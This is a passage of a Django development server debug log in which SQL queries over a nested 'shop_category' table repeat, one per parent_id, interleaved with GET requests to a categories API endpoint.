(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:48:47,443 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:48:47,446 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:48:47,448 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:48:47,452 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:48:47,454 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:48:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:48:49,160 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:48:49,172 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:48:49,179 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:48:49,183 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:48:49,189 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:48:49,193 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:48:49,195 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:48:49,197 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:48:49,200 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:48:49,203 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:48:49,207 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:48:49,209 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:48:49,211 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:48:49,213 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:48:49,217 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:48:49,219 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:48:49,221 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:48:49,223 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:48:49,225 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:48:49,229 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:48:49,231 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:48:49,233 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:48:49,235 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:48:49,238 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:48:49,240 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:48:49,243 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:48:49,246 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:48:49,248 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:48:49,250 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:48:49,252 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:48:49,255 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:48:49,258 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:48:49,260 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:48:49,263 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:48:49,265 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:48:49,269 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:48:49,272 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:48:49,274 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:48:49,276 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:48:49,279 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:48:49,282 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:48:49,285 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:48:49,288 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:48:49,290 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:48:49,293 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:48:49,297 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:48:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:48:49,439 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 12:48:49,444 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [16/Dec/2019 12:48:49] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-16 12:49:31,685 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-16 12:49:31,692 utils 20136 140506432534272 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:49:31,698 utils 20136 140506667599616 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:49:31,701 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:49:31,707 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) [16/Dec/2019 12:49:31] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-16 12:49:31,710 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:49:31,715 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:49:31,719 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:49:31,722 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:49:31,725 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:49:31,729 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:49:31,734 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:49:31,738 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:49:31,741 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 